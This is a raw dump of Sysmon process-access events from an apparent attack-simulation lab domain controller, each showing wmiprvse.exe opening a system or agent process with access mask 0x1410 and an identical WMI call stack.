15:59:48.740{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028245Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028244Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028243Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028242Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028241Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028240Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028239Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028238Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028237Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028236Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028235Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028234Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028233Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028232Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028231Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028230Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028229Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028228Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028227Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028226Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 